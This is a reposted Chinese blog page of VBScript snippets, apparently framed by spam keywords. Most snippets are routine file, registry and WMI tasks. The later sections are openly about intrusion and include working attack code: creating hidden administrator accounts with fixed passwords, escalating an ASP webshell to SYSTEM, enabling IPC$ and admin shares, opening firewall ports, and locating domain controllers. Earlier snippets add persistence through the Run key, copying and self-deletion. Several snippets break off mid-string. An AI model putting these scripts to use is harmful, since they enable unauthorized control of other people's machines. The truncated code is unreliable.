中文字幕理论片,69视频免费在线观看,亚洲成人app,国产1级毛片,刘涛最大尺度戏视频,欧美亚洲美女视频,2021韩国美女仙女屋vip视频

打開(kāi)APP
userphoto
未登錄

開(kāi)通VIP,暢享免費(fèi)電子書(shū)等14項(xiàng)超值服

開(kāi)通VIP

首頁(yè)

好書(shū)

留言交流

下載APP

聯(lián)系客服
vbs的一些用法

VBS獲取系統(tǒng)安裝路徑

先定義這個(gè)變量是獲取系統(tǒng)安裝路徑的,然后我們用”&strWinDir&”調(diào)用這個(gè)變量。

 

set WshShell = WScript.CreateObject("WScript.Shell")
strWinDir = WshShell.ExpandEnvironmentStrings("%WinDir%")


VBS獲取C:\Program Files路徑

 

msgbox CreateObject("WScript.Shell").ExpandEnvironmentStrings("%ProgramFiles%")


VBS獲取C:\Program Files\Common Files路徑

 

msgbox CreateObject("WScript.Shell").ExpandEnvironmentStrings("%CommonProgramFiles%")


給桌面添加網(wǎng)址快捷方式

 

set gangzi = WScript.CreateObject("WScript.Shell")
strDesktop = gangzi.SpecialFolders("Desktop")
set oShellLink = gangzi.CreateShortcut(strDesktop & "\Internet Explorer.lnk")
oShellLink.TargetPath = "oShellLink.Description = "Internet Explorer"
oShellLink.IconLocation = "%ProgramFiles%\Internet Explorer\iexplore.exe, 0"
oShellLink.Save


給收藏夾添加網(wǎng)址

 

Const ADMINISTRATIVE_TOOLS = 6

Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace(ADMINISTRATIVE_TOOLS)
Set objFolderItem = objFolder.Self   

Set objShell = WScript.CreateObject("WScript.Shell")
strDesktopFld = objFolderItem.Path
Set objURLShortcut = objShell.CreateShortcut(strDesktopFld & "\奮斗Blog.url")
objURLShortcut.TargetPath = "objURLShortcut.Save


刪除指定目錄指定后綴文件

 

On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile "C:\*.vbs", True
Set fso = Nothing


VBS改主頁(yè)

 

Set oShell = CreateObject("WScript.Shell")
oShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","


VBS加啟動(dòng)項(xiàng)

 

Set oShell=CreateObject("Wscript.Shell")
oShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\cmd","cmd.exe"


VBS復(fù)制自己

 

set copy1=createobject("scripting.filesystemobject")
copy1.getfile(wscript.scriptfullname).copy("c:\huan.vbs")


復(fù)制自己到C盤(pán)的huan.vbs(復(fù)制本vbs目錄下的game.exe文件到c盤(pán)的gangzi.exe)

 

set copy1=createobject("scripting.filesystemobject")
copy1.getfile("game.exe").copy("c:\gangzi.exe")


VBS獲取系統(tǒng)臨時(shí)目錄

 

Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
Dim tempfolder
Const TemporaryFolder = 2
Set tempfolder = fso.GetSpecialFolder(TemporaryFolder)
Wscript.Echo tempfolder


就算代碼出錯(cuò) 依然繼續(xù)執(zhí)行

 

On Error Resume Next


VBS打開(kāi)網(wǎng)址

 

Set objShell = CreateObject("Wscript.Shell")
objShell.Run("


VBS發(fā)送郵件

 

NameSpace = "Set Email = CreateObject("CDO.Message")
Email.From = "發(fā)件@qq.com"
Email.To = "收件@qq.com"
Email.Subject = "Test sendmail.vbs"
Email.Textbody = "OK!"
Email.AddAttachment "C:\1.txt"
With Email.Configuration.Fields
.Item(NameSpace&"sendusing") = 2
.Item(NameSpace&"smtpserver") = "smtp.郵件服務(wù)器.com"
.Item(NameSpace&"smtpserverport") = 25
.Item(NameSpace&"smtpauthenticate") = 1
.Item(NameSpace&"sendusername") = "發(fā)件人用戶(hù)名"
.Item(NameSpace&"sendpassword") = "發(fā)件人密碼"
.Update
End With
Email.Send


VBS結(jié)束進(jìn)程

 

strComputer = "."
Set objWMIService = GetObject _
    ("winmgmts:\\" & strComputer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery _
    ("Select * from Win32_Process Where Name = 'Rar.exe'")
For Each objProcess in colProcessList
    objProcess.Terminate()
Next


VBS隱藏打開(kāi)網(wǎng)址(部分瀏覽器無(wú)法隱藏打開(kāi),而是直接打開(kāi),適合主流用戶(hù)使用)

 

createObject("wscript.shell").run "iexplore 


兼容所有瀏覽器,使用IE的絕對(duì)路徑+參數(shù)打開(kāi),無(wú)法用函數(shù)得到IE安裝路徑,只用函數(shù)得到了Program Files路徑,應(yīng)該比上面的方法好,但是兩種方法都不是絕對(duì)的。

 

Set objws=WScript.CreateObject("wscript.shell")
objws.Run """C:\Program Files\Internet Explorer\iexplore.exe""


VBS遍歷硬盤(pán)刪除指定文件名

 

On Error Resume Next
Dim fPath
strComputer = "."
Set objWMIService = GetObject _
    ("winmgmts:\\" & strComputer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery _
    ("Select * from Win32_Process Where Name = 'gangzi.exe'")
For Each objProcess in colProcessList
    objProcess.Terminate()
Next
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colDirs = objWMIService. _
ExecQuery("Select * from Win32_Directory where name LIKE '%c:%' or name LIKE '%d:%' or name LIKE '%e:%' or name LIKE '%f:%' or name LIKE '%g:%' or name LIKE '%h:%' or name LIKE '%i:%'")
Set objFSO = CreateObject("Scripting.FileSystemObject")
For Each objDir in colDirs
fPath = objDir.Name & "\gangzi.exe"
objFSO.DeleteFile(fPath), True
Next


VBS獲取網(wǎng)卡MAC地址

 

Dim mc,mo
Set mc=GetObject("Winmgmts:").InstancesOf("Win32_NetworkAdapterConfiguration")
For Each mo In mc
If mo.IPEnabled=True Then
MsgBox "本機(jī)網(wǎng)卡MAC地址是: " & mo.MacAddress
Exit For
End If
Next


VBS獲取本機(jī)注冊(cè)表主頁(yè)地址

 

Set reg=WScript.CreateObject("WScript.Shell")
startpage=reg.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page")
MsgBox startpage


VBS遍歷所有磁盤(pán)的所有目錄,找到所有.txt的文件,然后給所有txt文件最底部加一句話

 

On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Co = VbCrLf & "路過(guò)。。。"

For Each i In fso.Drives
  If i.DriveType = 2 Then
    GF fso.GetFolder(i & "\")
  End If
Next

Sub GF(fol)
  Wh fol
  Dim i
  For Each i In fol.SubFolders
    GF i
  Next
End Sub

Sub Wh(fol)
  Dim i
  For Each i In fol.Files
    If LCase(fso.GetExtensionName(i)) = "shtml" Then
      fso.OpenTextFile(i,8,0).Write Co
    End If
  Next
End Sub


獲取計(jì)算機(jī)所有盤(pán)符

 

Set fso=CreateObject("scripting.filesystemobject")
Set objdrives=fso.Drives '取得當(dāng)前計(jì)算機(jī)的所有磁盤(pán)驅(qū)動(dòng)器
For Each objdrive In objdrives   '遍歷磁盤(pán)
MsgBox objdrive
Next


VBS給本機(jī)所有磁盤(pán)根目錄創(chuàng)建文件

 

On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set gangzis=fso.Drives '取得當(dāng)前計(jì)算機(jī)的所有磁盤(pán)驅(qū)動(dòng)器
For Each gangzi In gangzis   '遍歷磁盤(pán)
Set TestFile=fso.CreateTextFile(""&gangzi&"\新建文件夾.vbs",Ture)
TestFile.WriteLine("By TestFile.Close
Next


VBS遍歷本機(jī)全盤(pán)找到所有123.exe,然后給他們改名321.exe

 

set fs = CreateObject("Scripting.FileSystemObject")

for each drive in fs.drives
fstraversal drive.rootfolder
next

sub fstraversal(byval this)
for each folder in this.subfolders
fstraversal folder
next
set files = this.files
for each file in files
if file.name = "123.exe" then file.name = "321.exe"
next
end sub


VBS寫(xiě)入代碼到粘貼板(先說(shuō)明一下,VBS寫(xiě)內(nèi)容到粘貼板,網(wǎng)上千篇一律都是通過(guò)InternetExplorer.Application對(duì)象來(lái)實(shí)現(xiàn),但是缺點(diǎn)是在默認(rèn)瀏覽器為非IE中會(huì)彈出瀏覽器,所以費(fèi)了很大的勁找到了這個(gè)代碼來(lái)實(shí)現(xiàn))

 

str=“這里是你要復(fù)制到剪貼板的字符串”
Set ws = wscript.createobject("wscript.shell")
ws.run "mshta vbscript:clipboardData.SetData("+""""+"text"+""""+","+""""&str&""""+")(close)",0,true


QQ自動(dòng)發(fā)消息

 

On Error Resume Next
str="我是笨蛋/qq"
Set WshShell=WScript.CreateObject("WScript.Shell")
WshShell.run "mshta vbscript:clipboardData.SetData("+""""+"text"+""""+","+""""&str&""""+")(close)",0
WshShell.run "tencent://message/?Menu=yes&uin=20016964&Site=&Service=200&sigT=2a39fb276d15586e1114e71f7af38e195148b0369a16a40fdad564ce185f72e8de86db22c67ec3c1",0,true
WScript.Sleep 3000
WshShell.SendKeys "^v"
WshShell.SendKeys "%s"


VBS隱藏文件

 

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile("F:\軟件大賽\show.txt")
If objFile.Attributes = objFile.Attributes AND 2 Then
    objFile.Attributes = objFile.Attributes XOR 2
End If


VBS生成隨機(jī)數(shù)(521是生成規(guī)則,不同的數(shù)字生成的規(guī)則不一樣,可以用于其它用途)

 

Randomize 521
point=Array(Int(100*Rnd+1),Int(1000*Rnd+1),Int(10000*Rnd+1))
msgbox join(point,"")


VBS刪除桌面IE圖標(biāo)(非快捷方式)

 

Set oShell = CreateObject("WScript.Shell")
oShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon",1,"REG_DWORD"


VBS獲取自身文件名

 

Set fso = CreateObject("Scripting.FileSystemObject")
msgbox WScript.ScriptName


VBS讀取Unicode編碼的文件

 

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.OpenTextFile("gangzi.txt",1,False,-1)
strText = objFile.ReadAll
objFile.Close
Wscript.Echo strText


VBS讀取指定編碼的文件(默認(rèn)為uft-8)gangzi變量是要讀取文件的路徑

 

set stm2 =createobject("ADODB.Stream")
stm2.Charset = "utf-8"
stm2.Open
stm2.LoadFromFile gangzi
readfile = stm2.ReadText
MsgBox readfile


VBS禁用組策略

 

Set oShell = CreateObject("WScript.Shell")
oShell.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\RestrictToPermittedSnapins",1,"REG_DWORD"


VBS寫(xiě)指定編碼的文件(默認(rèn)為uft-8)gangzi變量是要讀取文件的路徑,gangzi2是內(nèi)容變量

 

gangzi="1.txt"
gangzi2="Set Stm1 = CreateObject("ADODB.Stream")
Stm1.Type = 2
Stm1.Open
Stm1.Charset = "UTF-8"
Stm1.Position = Stm1.Size
Stm1.WriteText gangzi2
Stm1.SaveToFile gangzi,2
Stm1.Close
set Stm1 = nothing


VBS獲取當(dāng)前目錄下所有文件夾名字(不包括子文件夾)

 

Set fso=CreateObject("scripting.filesystemobject")
Set f=fso.GetFolder(fso.GetAbsolutePathName("."))
Set folders=f.SubFolders
For Each fo In folders
  wsh.echo fo.Name
Next
Set folders=Nothing
Set f=nothing
Set fso=nothing


VBS獲取指定目錄下所有文件夾名字(包括子文件夾)

 

Dim t
Set fso=WScript.CreateObject("scripting.filesystemobject")
Set fs=fso.GetFolder("d:\")
WScript.Echo aa(fs)
Function aa(n)
Set f=n.subfolders
For Each uu In f
Set op=fso.GetFolder(uu.path)
t=t & vbcrlf & op.path
Call aa(op)
Next
aa=t
End function


VBS創(chuàng)建.URL文件(IconIndex參數(shù)不同的數(shù)字代表不同的圖標(biāo),具體請(qǐng)參照SHELL32.dll里面的所有圖標(biāo))

 

set fso=createobject("scripting.filesystemobject")
qidong=qidong&"[InternetShortcut]"&Chr(13)&Chr(10)
qidong=qidong&"URL=http://www.baidu.com"&Chr(13)&Chr(10)
qidong=qidong&"IconFile=C:\WINDOWS\system32\SHELL32.dll"&Chr(13)&Chr(10)
qidong=qidong&"IconIndex=130"&Chr(13)&Chr(10)
Set TestFile=fso.CreateTextFile("qq.url",Ture)
TestFile.WriteLine(qidong)
TestFile.Close


VBS寫(xiě)hosts(沒(méi)寫(xiě)判斷,無(wú)論存不存在都追加底部)

 

Set fs = CreateObject("Scripting.FileSystemObject")
path = ""&fs.GetSpecialFolder(1)&"\drivers\etc\hosts"
Set f = fs.OpenTextFile(path,8,TristateFalse)
f.Write ""&vbcrlf&"127.0.0.1 f.Close


VBS讀取出HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace 下面所有鍵的名字并循環(huán)輸出

 

Const HKLM = &H80000002
strPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace"
Set oreg = GetObject("Winmgmts:\root\default:StdRegProv")
    oreg.EnumKey HKLM,strPath,arr
    For Each x In arr
        WScript.Echo x
    Next


VBS創(chuàng)建txt文件

 

Dim fso,TestFile
Set fso=CreateObject("Scripting.FileSystemObject")
Set TestFile=fso.CreateTextFile("C:\hello.txt",Ture)
TestFile.WriteLine("Hello,World!")
TestFile.Close


VBS創(chuàng)建文件夾

 

Dim fso,fld
Set fso=CreateObject("Scripting.FileSystemObject")
Set fld=fso.CreateFolder("C:\newFolder")


VBS判斷文件夾是否存在

 

Dim fso,fld
Set fso=CreateObject("Scripting.FileSystemObject")
If (fso.FolderExists("C:\newFolder")) Then
msgbox("Folder exists.")
else
set fld=fso.CreateFolder("C:\newFolder")
End If


VBS使用變量判斷文件夾

 

Dim fso,fld
drvName="C:\"
fldName="newFolder"
Set fso=CreateObject("Scripting.FileSystemObject")
If (fso.FolderExists(drvName&fldName)) Then
msgbox("Folder exists.")
else
set fld=fso.CreateFolder(drvName&fldName)
End If


VBS加輸入框

 

Dim fso,TestFile,fileName,drvName,fldName
drvName=inputbox("Enter the drive to save to:","Drive letter")
fldName=inputbox("Enter the folder name:","Folder name")
fileName=inputbox("Enter the name of the file:","Filename")
Set fso=CreateObject("Scripting.FileSystemObject")

If(fso.FolderExists(drvName&fldName))Then
msgbox("Folder exists")
Else
Set fld=fso.CreateFolder(drvName&fldName)
End If

Set TestFile=fso.CreateTextFile(drvName&fldName&"\"&fileName&".txt",True)

TestFile.WriteLine("Hello,World!")
TestFile.Close


VBS檢查是否有相同文件

 

Dim fso,TestFile,fileName,drvName,fldName
drvName=inputbox("Enter the drive to save to:","Drive letter")
fldName=inputbox("Enter the folder name:","Folder name")
fileName=inputbox("Enter the name of the file:","Filename")
Set fso=CreateObject("Scripting.FileSystemObject")

If(fso.FolderExists(drvName&fldName))Then
msgbox("Folder exists")
Else
Set fld=fso.CreateFolder(drvName&fldName)
End If

If(fso.FileExists(drvName&fldName&"\"&fileName&".txt"))Then
msgbox("File already exists.")
Else
Set TestFile=fso.CreateTextFile(drvName&fldName&"\"&fileName&".txt",True)
TestFile.WriteLine("Hello,World!")
TestFile.Close
End If


VBS改寫(xiě)、追加 文件

 

Dim fso,openFile
Set fso=CreateObject("Scripting.FileSystemObject")
Set openFile=fso.OpenTextFile("C:\test.txt",2,True)   '1表示只讀,2表示可寫(xiě),8表示追加
openFile.Write "Hello World!"
openFile.Close


VBS讀取文件 ReadAll 讀取全部

 

Dim fso,openFile
Set fso=CreateObject("Scripting.FileSystemObject")
Set openFile=fso.OpenTextFile("C:\test.txt",1,True)
MsgBox(openFile.ReadAll)


VBS讀取文件 ReadLine 讀取一行

 

Dim fso,openFile
Set fso=CreateObject("Scripting.FileSystemObject")
Set openFile=fso.OpenTextFile("C:\test.txt",1,True)
MsgBox(openFile.ReadLine())
MsgBox(openFile.ReadLine())   '如果讀取行數(shù)超過(guò)文件的行數(shù),就會(huì)出錯(cuò)


VBS讀取文件 Read 讀取n個(gè)字符

 

Dim fso,openFile
Set fso=CreateObject("Scripting.FileSystemObject")
Set openFile=fso.OpenTextFile("C:\test.txt",1,True)
MsgBox(openFile.Read(2))   '如果超出了字符數(shù),不會(huì)出錯(cuò)。


VBS刪除文件

 

Dim fso
Set fso=CreateObject("Scripting.FileSystemObject")
fso.DeleteFile("C:\test.txt")


VBS刪除文件夾

 

Dim fso
Set fso=CreateObject("Scripting.FileSystemObject")
fso.DeleteFolder("C:\newFolder") '不管文件夾中有沒(méi)有文件都一并刪除


VBS連續(xù)創(chuàng)建文件

 

Dim fso,TestFile
Set fso=CreateObject("Scripting.FileSystemObject")
For i=1 To 10
Set TestFile=fso.CreateTextFile("C:\hello"&i&".txt",Ture)
TestFile.WriteLine("Hello,World!")
TestFile.Close
Next


VBS根據(jù)計(jì)算機(jī)名隨機(jī)生成字符串

 

set ws=createobject("wscript.shell")
set wenv=ws.environment("process")
RDA=wenv("computername")
Function UCharRand(n)
For i=1 to n
Randomize ASC(MID(RDA,1,1))
temp = cint(25*Rnd)
temp = temp +65
UCharRand = UCharRand & chr(temp)
Next
End Function
msgbox UCharRand(LEN(RDA))


VBS根據(jù)mac生成序列號(hào)

 

Function Encode(strPass)
   Dim i, theStr, strTmp

   For i = 1 To Len(strPass)
    strTmp = Asc(Mid(strPass, i, 1))
    theStr = theStr & Abs(strTmp)
   Next

   strPass = theStr
   theStr = ""

   Do While Len(strPass) > 16
    strPass = JoinCutStr(strPass)
   Loop

   For i = 1 To Len(strPass)
    strTmp = CInt(Mid(strPass, i, 1))
    strTmp = IIf(strTmp > 6, Chr(strTmp + 60), strTmp)
    theStr = theStr & strTmp
   Next

   Encode = theStr
End Function

Function JoinCutStr(str)
   Dim i, theStr
   For i = 1 To Len(str)
    If Len(str) - i = 0 Then Exit For
    theStr = theStr & Chr(CInt((Asc(Mid(str, i, 1)) + Asc(Mid(str, i +1, 1))) / 2))
    i = i + 1
   Next
   JoinCutStr = theStr
End Function

Function IIf(var, val1, val2)
   If var = True Then
    IIf = val1
   Else
    IIf = val2
   End If
End Function

Set mc=GetObject("Winmgmts:").InstancesOf("Win32_NetworkAdapterConfiguration")
For Each mo In mc
If mo.IPEnabled=True Then
theStr = mo.MacAddress
Exit For
End If
Next

Randomize Encode(theStr)
rdnum=Int(10*Rnd+5)

Function allRand(n)
  For i=1 to n
    Randomize Encode(theStr)
    temp = cint(25*Rnd)
    If temp mod 2 = 0 then
      temp = temp + 97
    ElseIf temp < 9 then
      temp = temp + 48
    Else
      temp = temp + 65
    End If
    allRand = allRand & chr(temp)
  Next
End Function
msgbox allRand(rdnum)


VBS自動(dòng)連接adsl

 

Dim Wsh
Set Wsh = WScript.CreateObject("WScript.Shell")
wsh.run "Rasdial 連接名字 賬號(hào) 密碼",false,1


VBS自動(dòng)斷開(kāi)ADSL

 

Dim Wsh
Set Wsh = WScript.CreateObject("WScript.Shell")
wsh.run "Rasdial /DISCONNECT",false,1


VBS每隔3秒自動(dòng)更換IP并打開(kāi)網(wǎng)址實(shí)例(值得一提的是,下面這個(gè)代碼中每次打開(kāi)的網(wǎng)址都是引用同一個(gè)IE窗口,也就是每次打開(kāi)的是覆蓋上次打開(kāi)的窗口,如果需要每次打開(kāi)的網(wǎng)址都是新窗口,直接使用run就可以了)

 

Dim Wsh
Set Wsh = WScript.CreateObject("WScript.Shell")
Set oIE = CreateObject("InternetExplorer.Application")
for i=1 to 5
wsh.run "Rasdial /DISCONNECT",false,1
wsh.run "Rasdial 連接名字 賬號(hào) 密碼",false,1
oIE.Navigate "Call SynchronizeIE
oIE.Visible = True
next
Sub SynchronizeIE
On Error Resume Next
Do While(oIE.Busy)
WScript.Sleep 3000
Loop
End Sub


用VBS來(lái)加管理員賬號(hào)
在注入過(guò)程中明明有了sa賬號(hào),但是由于net.exe和net1.exe被限制,或其它的不明原因,總是加不了管理員賬號(hào)。VBS在活動(dòng)目錄(adsi)部份有一個(gè)winnt對(duì)像,可以用來(lái)管理本地資源,可以用它不依靠cmd等命令來(lái)加一個(gè)管理員,詳細(xì)代碼如下:

 

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口,綁定
Set oe=GetObject(os&"/Administrators,group") '屬性,admin組
Set od=ob.Create("user","lcx") '建立用戶(hù)
od.SetPassword "123456" '設(shè)置密碼
od.SetInfo '保存
Set of=GetObject(os&"/lcx",user) '得到用戶(hù)
oe.add os&"/lcx"


這段代碼如果保存為1.vbs,在cmd下運(yùn)行,格式: cscript 1.vbs的話,會(huì)在當(dāng)前系統(tǒng)加一個(gè)名字為lcx,密碼為123456的管理員。當(dāng)然,你可以用記事本來(lái)修改里邊的變量lcx和123456,改成你喜歡的名字和密碼值。

用vbs來(lái)列虛擬主機(jī)的物理目錄
有時(shí)旁注入侵成功一個(gè)站,拿到系統(tǒng)權(quán)限后,面對(duì)上百個(gè)虛擬主機(jī),怎樣才能更快的找到我們目標(biāo)站的物理目錄呢?一個(gè)站一個(gè)站翻看太累,用系統(tǒng)自帶的adsutil.vbs吧又感覺(jué)好像參數(shù)很多,有點(diǎn)無(wú)法下手的感覺(jué),試試我這個(gè)腳本吧,代碼如下:

 

Set ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
sServerName=Obj3w.ServerComment
Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root")
ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf

End If
Next
WScript.Echo ListAllWeb
Set ObjService=Nothing
WScript.Quit


運(yùn)行cscript 2.vbs后,就會(huì)詳細(xì)列出IIS里的站點(diǎn)ID、描述、及物理目錄,是不是代碼少很多又方便呢?

用VBS快速找到內(nèi)網(wǎng)域的主服務(wù)器
面對(duì)域結(jié)構(gòu)的內(nèi)網(wǎng),可能許多小菜沒(méi)有經(jīng)驗(yàn)如何去滲透。如果你能拿到主域管理員的密碼,整個(gè)內(nèi)網(wǎng)你就可以自由穿行了。主域管理員一般呆在比較重要的機(jī)器上,如果能搞定其中的一臺(tái)或幾臺(tái),放個(gè)密碼記錄器之類(lèi),相信總有一天你會(huì)拿到密碼。主域服務(wù)器當(dāng)然是其中最重要一臺(tái)了,如何在成千臺(tái)機(jī)器里判斷出是哪一臺(tái)呢?dos命令像net group “domain admins” /domain可以做為一個(gè)判斷的標(biāo)準(zhǔn),不過(guò)vbs也可以做到的,這仍然屬于adsi部份的內(nèi)容,代碼如下:

 

set obj=GetObject("wscript.echo obj.servername


只用這兩句代碼就足夠了,運(yùn)行cscript 3.vbs,會(huì)有結(jié)果的。當(dāng)然,無(wú)論是dos命令或vbs,你前提必須要在域用戶(hù)的權(quán)限下。好比你得到了一個(gè)域用戶(hù)的賬號(hào)密碼,你可以用 psexec.exe -u -p cmd.exe這樣的格式來(lái)得到域用戶(hù)的shell,或你的木馬本來(lái)就是與桌面交互的,登陸你木馬shell的又是域用戶(hù),就可以直接運(yùn)行這些命令了。
vbs的在入侵中的作用當(dāng)然不只這些,當(dāng)然用js或其它工具也可以實(shí)現(xiàn)我上述代碼的功能;不過(guò)這個(gè)專(zhuān)欄定下的題目是vbs在hacking中的妙用,所以我們只提vbs。寫(xiě)完vbs這部份我和其它作者會(huì)在以后的專(zhuān)欄繼續(xù)策劃其它的題目,爭(zhēng)取為讀者帶來(lái)好的有用的文章。

WebShell提權(quán)用的VBS代碼
asp木馬一直是搞腳本的朋友喜歡使用的工具之一,但由于它的權(quán)限一般都比較低(一般是IWAM_NAME權(quán)限),所以大家想出了各種方法來(lái)提升它的權(quán)限,比如說(shuō)通過(guò)asp木馬得到mssql數(shù)據(jù)庫(kù)的權(quán)限,或拿到ftp的密碼信息,又或者說(shuō)是替換一個(gè)服務(wù)程序。而我今天要介紹的技巧是利用一個(gè)vbs文件來(lái)提升asp木馬的權(quán)限,代碼如下asp木馬一直是搞腳本的朋友喜歡使用的工具之一,但由于它的權(quán)限一般都比較低(一般是IWAM_NAME權(quán)限),所以大家想出了各種方法來(lái)提升它的權(quán)限,比如說(shuō)通過(guò)asp木馬得到mssql數(shù)據(jù)庫(kù)的權(quán)限,或拿到ftp的密碼信息,又或者說(shuō)是替換一個(gè)服務(wù)程序。而我今天要介紹的技巧是利用一個(gè)vbs文件來(lái)提升asp木馬的權(quán)限,代碼如下:

 

set wsh=createobject("wscript.shell") '創(chuàng)建一個(gè)wsh對(duì)象
a=wsh.run ("cmd.exe /c cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps C:\WINNT\system32\inetsrv\httpext.dll C:\WINNT\system32\inetsrv\httpodbc.dll C:\WINNT\system32\inetsrv\ssinc.dll C:\WINNT\system32\msw3prt.dll C:\winnt\system32\inetsrv\asp.dll",0) '加入asp.dll到InProcessIsapiApps中


將其保存為vbs的后綴,再上傳到服務(wù)上,
然后利用asp木馬執(zhí)行這個(gè)vbs文件后。再試試你的asp木馬吧,你會(huì)發(fā)現(xiàn)自己己經(jīng)是system權(quán)限了

VBS開(kāi)啟ipc服務(wù)和相關(guān)設(shè)置

 

Dim OperationRegistry
Set OperationRegistry=WScript.CreateObject("WScript.Shell")
OperationRegistry.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\forceguest",0

Set wsh3=wscript.createobject("wscript.shell")
wsh3.Run "net user helpassistant 123456",0,false
wsh3.Run "net user helpassistant /active",0,false
wsh3.Run "net localgroup administrators helpassistant /add",0,false

wsh3.Run "net start Lanmanworkstation /y",0,false
wsh3.Run "net start Lanmanserver /y",0,false
wsh3.Run "net start ipc$",0,True
wsh3.Run "net share c$=c:\",0,false

wsh3.Run "netsh firewall set notifications disable",0,True
wsh3.Run "netsh firewall set portopening TCP 139 enable",0,false
wsh3.Run "netsh firewall set portopening UDP 139 enable",0,false
wsh3.Run "netsh firewall set portopening TCP 445 enable",0,false
wsh3.Run "netsh firewall set portopening UDP 445 enable",0,false


VBS時(shí)間判斷代碼

 

Digital=time
    hours=Hour(Digital)
    minutes=Minute(Digital)
    seconds=Second(Digital)
    if (hours<6) then
        dn="凌辰了,還沒(méi)睡啊?"
    end if
    if (hours>=6) then
        dn="早上好!"
    end if
    if (hours>12) then
        dn="下午好!"
    end if
    if (hours>18) then
        dn="晚上好!"
    end if
    if (hours>22) then
        dn="不早了,夜深了,該睡覺(jué)了!"
    end if
    if (minutes<=9) then
        minutes="0" & minutes
    end if
    if (seconds<=9) then
        seconds="0" & seconds
    end if
ctime=hours & ":" & minutes & ":" & seconds & " " & dn
Msgbox ctime


VBS注冊(cè)表讀寫(xiě)

 

Dim OperationRegistry , mynum
Set OperationRegistry=WScript.CreateObject("WScript.Shell")
mynum = 9
mynum = OperationRegistry.RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\forceguest")
MsgBox("before forceguest = "&mynum)

OperationRegistry.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\forceguest",0

mynum = OperationRegistry.RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\forceguest")
MsgBox("after forceguest = "&mynum)


VBS運(yùn)行后刪除自身代碼

 

dim fso,f
Set fso = CreateObject("Scripting.FileSystemObject")

f = fso.DeleteFile(WScript.ScriptName)

WScript.Echo( WScript.ScriptName)

搜索出的文件復(fù)制到另一個(gè)指定文件夾

set r=createobject("scripting.filesystemobject")
p="c:\a.rar"'指定文件夾改文件名為a.rar
w="tem1.rar"'源

pth="d:\123\a34"'源文件夾

f pth

d pth

sub d(x)

on error resume next

for each i in r.getfolder(x).subfolders

f i

d i

next

end sub

sub f(n)

for each c in r.getfolder(n).files

if instr(1,c,w,1)>0 then

r.copyfile c,p

if r.fileexists(c) then

msgbox"成功",64

else

msgbox"失敗",16

end if

wscript.quit

end if

next

end sub
-----------------------------------------------------------------
Dim AutoRunProgram     聲明變量 Set AutoRunProgram = WScript.CreateObject("WScript.shell") RegPath ="HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"    這是開(kāi)機(jī)啟動(dòng)的注冊(cè)表地址 Type_Name = "REG_SZ"   這是注冊(cè)表中的數(shù)據(jù)類(lèi)型 Key_Name = "****"     這里是存入注冊(cè)表的鍵值名稱(chēng),用你需要開(kāi)機(jī)啟動(dòng)的程序的名字 Key_data = "C:\******.vbs"    這里是需要開(kāi)機(jī)啟動(dòng)的程序的具體路徑 AutorunProgram.RegWrite regpath&Key_Name,Key_data,Type_Name  結(jié)束進(jìn)程 strComputer="."  Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")  Set colProcessList=objWMIService.ExecQuery ("select * from Win32_Process where Name='notepad.exe' ")  For Each objProcess in colProcessList  objProcess.Terminate()  next
打開(kāi)APP,閱讀全文并永久保存 查看更多類(lèi)似文章
猜你喜歡
類(lèi)似文章
[寄存]VBS對(duì)文件文件夾操作的例子
用VBA宏自動(dòng)改變Excel宏安全級(jí)別設(shè)…
VBS腳本病毒特點(diǎn) 原理分析以及如何防范
VBS常用腳本 好東西
一些很惡作劇的vbs程序代碼
VBS讀寫(xiě)文件及創(chuàng)建、刪除文件
更多類(lèi)似文章 >>
生活服務(wù)
熱點(diǎn)新聞
分享 收藏 導(dǎo)長(zhǎng)圖 關(guān)注 下載文章
綁定賬號(hào)成功
后續(xù)可登錄賬號(hào)暢享VIP特權(quán)!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服